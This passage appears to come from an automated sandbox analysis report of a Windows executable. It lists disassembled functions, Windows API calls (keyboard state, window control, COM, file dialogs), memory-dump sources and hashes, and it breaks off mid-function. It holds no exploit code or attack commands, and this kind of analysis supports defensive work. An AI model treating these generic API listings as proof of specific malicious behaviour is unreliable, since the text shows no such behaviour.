                            • _wprintf.LIBCMT ref: 0045E6A3
                            • _wprintf.LIBCMT ref: 0045E6C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2295938435-8599901
                            • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                            • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                            • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                            • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                            Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • timeGetTime.WINMM ref: 00443B67
                              • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                            • Sleep.KERNEL32(0000000A), ref: 00443B9F
                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                            • SetActiveWindow.USER32(00000000), ref: 00443BEC
                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                            • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                            • Sleep.KERNEL32(000000FA), ref: 00443C2D
                            • IsWindow.USER32(00000000), ref: 00443C3A
                            • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                            • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                            • String ID: BUTTON
                            • API String ID: 1834419854-3405671355
                            • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                            • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                            • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                            • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                            Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                            • LoadStringW.USER32(00000000), ref: 00454040
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • _wprintf.LIBCMT ref: 00454074
                            • __swprintf.LIBCMT ref: 004540A3
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                            • API String ID: 455036304-4153970271
                            • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                            • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                            • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                            • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                            Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                            • _memmove.LIBCMT ref: 00467EB8
                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                            • _memmove.LIBCMT ref: 00467F6C
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                            • String ID:
                            • API String ID: 2170234536-0
                            • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                            • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                            • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                            • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                            Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00453CE0
                            • SetKeyboardState.USER32(?), ref: 00453D3B
                            • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                            • GetKeyState.USER32(000000A0), ref: 00453D75
                            • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                            • GetKeyState.USER32(000000A1), ref: 00453DB5
                            • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                            • GetKeyState.USER32(00000011), ref: 00453DEF
                            • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                            • GetKeyState.USER32(00000012), ref: 00453E26
                            • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                            • GetKeyState.USER32(0000005B), ref: 00453E5D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                            • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                            • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                            • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                            Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • GetDlgItem.USER32(?,00000001), ref: 004357DB
                            • GetWindowRect.USER32(00000000,?), ref: 004357ED
                            • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                            • GetDlgItem.USER32(?,00000002), ref: 0043586A
                            • GetWindowRect.USER32(00000000,?), ref: 0043587C
                            • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                            • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                            • GetWindowRect.USER32(00000000,?), ref: 004358EE
                            • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                            • GetDlgItem.USER32(?,000003EA), ref: 00435941
                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$ItemMoveRect$Invalidate
                            • String ID:
                            • API String ID: 3096461208-0
                            • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                            • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                            • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                            • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                            Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                            • DeleteObject.GDI32(?), ref: 0047151E
                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                            • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                            • DeleteObject.GDI32(?), ref: 004715EA
                            • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                            • String ID:
                            • API String ID: 3218148540-0
                            • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                            • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                            • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                            • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                            Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                            • String ID:
                            • API String ID: 136442275-0
                            • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                            • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                            • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                            • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                            Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                            Download Yara Rule
                            APIs
                            • _wcsncpy.LIBCMT ref: 00467490
                            • _wcsncpy.LIBCMT ref: 004674BC
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • _wcstok.LIBCMT ref: 004674FF
                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                            • _wcstok.LIBCMT ref: 004675B2
                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                            • _wcslen.LIBCMT ref: 00467793
                            • _wcscpy.LIBCMT ref: 00467641
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • _wcslen.LIBCMT ref: 004677BD
                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                            • String ID: X
                            • API String ID: 3104067586-3081909835
                            • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                            • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                            • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                            • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                            Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                            Download Yara Rule
                            APIs
                            • OleInitialize.OLE32(00000000), ref: 0046CBC7
                            • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                            • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                            • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                            • _wcslen.LIBCMT ref: 0046CDB0
                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                            • CoTaskMemFree.OLE32(?), ref: 0046CE42
                            • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                              • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                              • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                              • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                            Strings
                            • NULL Pointer assignment, xrefs: 0046CEA6
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                            • String ID: NULL Pointer assignment
                            • API String ID: 440038798-2785691316
                            • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                            • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                            • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                            • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                            Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                            Download Yara Rule
                            APIs
                            • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                            • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                            • _wcslen.LIBCMT ref: 004610A3
                            • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                            • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                            • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                            • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                            • GetWindowRect.USER32(?,?), ref: 00461248
                              • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                            • String ID: ThumbnailClass
                            • API String ID: 4136854206-1241985126
                            • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                            • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                            • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                            • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                            Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                            Download Yara Rule
                            APIs
                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                            • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                            • GetClientRect.USER32(?,?), ref: 00471A1A
                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                            • DestroyIcon.USER32(?), ref: 00471AF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                            • String ID: 2
                            • API String ID: 1331449709-450215437
                            • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                            • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                            • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                            • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                            Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
